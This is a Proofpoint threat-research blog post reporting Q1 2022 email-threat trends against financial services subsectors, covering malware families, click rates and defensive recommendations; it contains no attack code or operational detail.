As the Russia-Ukraine conflict continued to affect the threat landscape during the first quarter of 2022, chief information security officers (CISO) pivoted to monitoring for indicators of state-aligned activity, particularly across the financial services sector. And as attackers’ objectives and threat methods evolved, we saw cyber criminals leverage business email compromise (BEC), access brokers and ransomware to inflict the most financial damage across all sizes and types of organizations. In 2021, the adjusted losses from BEC alone were nearly $2.4 billion, according to the FBI.
Extensive phishing campaigns, combined with multiple threats per day distributing commodity stealers, have highlighted the importance of stolen credentials to criminal ecosystems. For proactive CISOs, continuously assessing the threats targeting their employees and adapting security controls to reduce risk have become business-critical protection measures.
To better understand the threats that organizations in the financial services sector are facing, Proofpoint threat researchers analyzed Q1 2022 data targeting customers, looking for trends that can assist CISOs in understanding industry-specific threats.
In addition to analyzing the trends across the industry, the data was divided into four subsectors, using “breadbasket” sampling to understand the malicious messages targeting financial services. Our researchers took it a step further and performed a deeper dive into that small percentage of malicious messages that made it to users’ mailboxes. The results highlight the areas of residual risk CISOs should assess against their organizational controls.
Financial services threat trending: Q3 2021 through Q1 2022
For this period, the financial services threat data that Proofpoint researchers analyzed illustrated attacks using techniques to harvest multifactor authentication (MFA) tokens. These types of attacks had a strong showing in the financial sector in January 2022 and continued to build throughout Q1.
Social engineering continued to dwarf other attack methods from a volume perspective as threat actors remain focused on user interaction for threat delivery as the path of least resistance.
On the malware front, Emotet retained the lead on the volume of emails throughout Q1 without much success in bypassing best-practice controls. Emotet, attributed to TA 542, and other banking Trojans like TrickBot are known access brokers. They use their malicious URLs and attachments to establish backdoor access.
Q1 saw Emotet shift in malware tactics and techniques, primarily focusing on malicious documents and thread hijacking as attackers work to diversify payloads and delivery mechanisms in their effort to bypass controls. The overarching trend was threat actors delivering malicious content that abuses command and script interpreters to execute nefarious commands, scripts or binaries.
In contrast, TA569, also known as SocGholish, remained the most effective threat actor in financial services. While many attackers use a multistage approach, TA569 impersonates security updates and uses redirects, resulting in ransomware.
A closer look at threats targeting financial services subsectors
Following is an overview of how attackers have been targeting financial services subsectors recently:
The good news is that threat volume doesn’t always translate to success, and the average click rate for social engineering-delivered messages declined in all financial services subsectors except for banking. Within banking, the average click rate on delivered messages surged in Q1 to 11% of delivered messages, with a five times increase in threat volume for Excel v4 macro threats.
Some malware had more success in engaging banking employees to click on messages. Ursnif and Formbook, for example, saw the highest success rates — 17% and 15%, respectively. That significant percentages of banking employees are taking the bait indicates a need to shine a light on some additional security awareness activities in a sector that normally excels in this area.
Qbot malware produced the highest number of total clicks, followed by Emotet, with Tordal, JSSLoader and Ursnif rounding out the top five (by total clicks).
Looking at techniques, user engagement with messages leveraging process injection (Mitre ATT&CK® T1055) in Q1 2022 was eight times greater than the total in Q2 2021.
Capital markets led all financial sectors in terms of the total number of clicks. Threat activity using a cluster of three techniques — obfuscation, thread hijacking and required user interaction for execution emerged in March 2022. This trend resulted in capital markets dramatically outpacing the other financial services subsectors in malicious messages delivered.
Attackers targeting organizations in the insurance industry were most effective at bypassing controls by using the malicious document builders EtterSilent and Tordal. User click rates increased each month.
Campaigns spreading the EtterSilent malware targeting the insurance sector provide great examples that should be used in security awareness training and phishing simulation programs.
Tordal malware produced the highest number of total clicks overall, and the cumulative result of the malicious messages delivered in Q1 was three times higher than in Q4 2021.
Fintech organizations also received messages when attackers used EtterSilent, Qbot and Ursnif malware. These messages increased threefold between October and December 2021. Click rates on these delivered messages averaged 3% in Q4 2021 and jumped significantly to 11% within fintech in Q1 2022. Qbot and Ursnif produced the highest click rates when targeting the fintech sector.
Adaptive controls are essential for addressing residual risk
Today, CISOs in the financial services industry face unique challenges and must adapt their security strategies for the post-pandemic era. And, as the “2022 Voice of the CISO” report from Proofpoint makes clear, the accelerated adoption of hybrid work and the impact of the Great Resignation have made improving information protection the most pressing initiative for financial services CISOs.
With the added complexity of employees working from anywhere, adaptive controls are critical. Implementing layered security controls is a proven approach in all security domains, and adaptive controls also reduce alert fatigue while enabling the business.
In the case of email threats, security training brings awareness to targeted users, automation removes malicious messages identified post-delivery, virtual isolation contains threats, and disabling unneeded scripting components and macro use where possible reduces residual risk further.
Download the “2022 Voice of the CISO” report from Proofpoint to learn more about how the CISO’s role is changing and how CISOs are coping with demands that are both increasing and evolving.
For the latest CISO news and resources, check out the Proofpoint CISO Hub.